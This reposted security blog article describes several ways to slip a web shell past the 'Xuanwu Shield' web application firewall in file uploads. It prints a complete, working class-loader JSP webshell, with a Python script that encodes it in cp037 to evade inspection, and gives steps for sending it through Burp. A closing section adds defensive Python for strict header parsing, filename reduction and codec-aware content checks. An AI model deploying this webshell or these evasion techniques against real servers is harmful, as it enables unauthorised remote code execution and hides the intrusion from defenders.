Filename bypass
Bypass with spaces on both sides of the boundary equals sign

```http
Content-Type: multipart/form-data;
boundary = ----WebKitFormBoundaryMJPuN1aHyzfAO2m3
```
![Figure 1 - Several ways to bypass Xuanwu Shield - NGC660 Security Lab](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd084257-1024x186.png)
Bypass with ASCII 0x09 (horizontal tab) on both sides of the boundary equals sign
![Figure 2 - Several ways to bypass Xuanwu Shield - NGC660 Security Lab](https://xzfile.aliyuncs.com/media/upload/picture/20220804173247-667f8d0c-13d8-1.png)
cp037 encoding bypass
![Figure 3 - Several ways to bypass Xuanwu Shield - NGC660 Security Lab](https://xzfile.aliyuncs.com/media/upload/picture/20220804173313-7603162c-13d8-1.png)
Bypass by appending a / after the filename
![Figure 4 - Several ways to bypass Xuanwu Shield - NGC660 Security Lab](https://xzfile.aliyuncs.com/media/upload/picture/20220804173346-89b0ef5a-13d8-1.png)
Malformed request method
![Figure 5 - Several ways to bypass Xuanwu Shield - NGC660 Security Lab](https://xzfile.aliyuncs.com/media/upload/picture/20220804173414-9a799ddc-13d8-1.png)
File content bypass
Unicode encoding
![Figure 6 - Several ways to bypass Xuanwu Shield - NGC660 Security Lab](https://xzfile.aliyuncs.com/media/upload/picture/20220804173449-af3d24e6-13d8-1.png)
cp037 encoding (the shell built into the script below works with either the .jsp or .jspx suffix; both are parsed)
Encoding script

```python
# Python 2 script (the same code also runs unchanged under Python 3)
data = '''<?xml version="1.0" encoding="cp037"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:declaration>
class PERFORM extends ClassLoader {
    PERFORM(ClassLoader c) { super(c); }
    public Class bookkeeping(byte[] b) { return super.defineClass(b, 0, b.length); }
}
public byte[] branch(String str) throws Exception {
    Class base64;
    byte[] value = null;
    try {
        base64 = Class.forName("sun.misc.BASE64Decoder");
        Object decoder = base64.newInstance();
        value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { str });
    } catch (Exception e) {
        try {
            base64 = Class.forName("java.util.Base64");
            Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
            value = (byte[]) decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
        } catch (Exception ee) {}
    }
    return value;
}
</jsp:declaration>
<jsp:scriptlet>
String cls = request.getParameter("xxoo");
if (cls != null) {
    new PERFORM(this.getClass().getClassLoader()).bookkeeping(branch(cls)).newInstance().equals(new Object[]{request, response});
}
</jsp:scriptlet>
</jsp:root>'''

# Write the page out in cp037 (EBCDIC); the file is closed when the block exits
with open('cp037.jsp', 'wb') as fcp037:
    fcp037.write(data.encode('cp037'))
```

![](https://xzfile.aliyuncs.com/media/upload/picture/20220804173607-de2cfbb4-13d8-1.png)
Once the file has been generated, use "Paste from file" in Burp to place it in the request body.
![Figure 7 - Several ways to bypass Xuanwu Shield - NGC660 Security Lab](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd084137.png)
![Figure 8 - Several ways to bypass Xuanwu Shield - NGC660 Security Lab](https://xzfile.aliyuncs.com/media/upload/picture/20220804173658-fc8dcca0-13d8-1.png)
The connection works normally.
![Figure 9 - Several ways to bypass Xuanwu Shield - NGC660 Security Lab](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd084204-1024x693.png)
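The three gaps the sections above lean on are parser leniency (whitespace or tabs around the boundary `=`), a filename check that does not reduce the name to a basename before looking at it (the trailing `/`), and byte-pattern inspection that never decodes the upload under the encoding the container will honour (cp037). The following Python is an added defender-side example, not code from the original post or from the Xuanwu Shield product: it implements a strict Content-Type parameter parser, a basename reducer that refuses names with no usable last segment, and a probe that decodes the head of an upload under each candidate codec before matching markup. The sample headers and file bytes are constructed for the demo, and the codec and marker lists are assumptions you would extend for your own stack.

```python
import re

# attribute "=" value with no whitespace on either side of "=" (RFC 7231 / RFC 2045).
# _TOKEN is the HTTP token character class; boundary values outside it must be quoted.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_PARAM_RE = re.compile(r'^(' + _TOKEN + r')=(' + _TOKEN + r'|"(?:[^"\\]|\\.)*")$')


def parse_content_type_strict(header):
    """Parse a Content-Type value without the leniency the bypasses rely on.

    Returns (media_type, params). Raises ValueError when a parameter has
    SP or HTAB (0x09) around '=', when the attribute is not a token, or when
    multipart/form-data carries no usable boundary. A WAF and a backend that
    disagree on these cases are exactly what the trick exploits, so the safe
    policy is to reject rather than guess which side is right.
    """
    media_type, _, rest = header.partition(';')
    media_type = media_type.strip(' \t').lower()
    params = {}
    for piece in rest.split(';'):
        piece = piece.strip(' \t')          # OWS around ';' is legal and dropped
        if not piece:
            continue
        m = _PARAM_RE.match(piece)
        if m is None:
            raise ValueError('malformed Content-Type parameter: %r' % piece)
        name, value = m.group(1).lower(), m.group(2)
        if value.startswith('"'):
            value = value[1:-1]             # quoted-string: strip the quotes
        params[name] = value
    if media_type == 'multipart/form-data' and not params.get('boundary'):
        raise ValueError('multipart/form-data without a usable boundary')
    return media_type, params


def accepts_content_type(header):
    """True if the header survives the strict parse, False otherwise."""
    try:
        parse_content_type_strict(header)
        return True
    except ValueError:
        return False


def upload_basename(filename):
    """Reduce a multipart filename to a plain basename, or None if there is none.

    With path separators honoured, a name ending in '/' has an empty last
    segment. A check that strips the slash and then inspects what is left
    accepts the very name it was meant to reject, so return None instead.
    """
    if not filename or any(ord(c) < 0x20 or ord(c) == 0x7F for c in filename):
        return None                         # control characters never belong in a name
    base = filename.replace('\\', '/').rsplit('/', 1)[-1]
    if base in ('', '.', '..'):
        return None
    return base


# Markup fragments a JSP/XML page starts with; extend for your own stack (assumption).
_MARKERS = ('<?xml', '<jsp:', '<%')
# Codecs worth trying; cp037 is the EBCDIC variant used in the post (assumption).
_CANDIDATE_CODECS = ('utf-8', 'cp037')


def encoded_markup_codec(blob, probe=512):
    """Return the codec under which the head of the upload contains markup.

    Matching raw bytes misses a page stored in cp037: the servlet container
    honours the declared encoding and decodes it, a byte-pattern rule does not.
    Decode the first `probe` bytes under each candidate codec and match the
    decoded text. None means no marker appeared under any codec.
    """
    head = blob[:probe]
    for codec in _CANDIDATE_CODECS:
        text = head.decode(codec, errors='replace')
        if any(marker in text for marker in _MARKERS):
            return codec
    return None


if __name__ == '__main__':
    # Constructed samples modelled on the headers shown in the post.
    for ct in ('multipart/form-data; boundary=----WebKitFormBoundaryMJPuN1aHyzfAO2m3',
               'multipart/form-data; boundary = ----WebKitFormBoundaryMJPuN1aHyzfAO2m3',
               'multipart/form-data; boundary\t=\t----WebKitFormBoundaryMJPuN1aHyzfAO2m3'):
        print('accept' if accepts_content_type(ct) else 'reject', repr(ct))
    print(upload_basename('report.pdf'), upload_basename('upload.jsp/'))
    ebcdic = '<?xml version="1.0" encoding="cp037"?><jsp:root/>'.encode('cp037')
    print(encoded_markup_codec(ebcdic), encoded_markup_codec(b'\x89PNG\r\n\x1a\n'))
```

Run it with no arguments to see the three headers classified, the two filenames reduced, and the EBCDIC sample reported as `cp037` while a PNG header is reported as `None`. The checks are deliberately independent so each can sit at the layer that sees the relevant data: the header parser at the proxy, the basename reducer and the codec probe in the upload handler.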
This article is reposted from the 先知 (Xianzhi) community; original author: 安全之路漫漫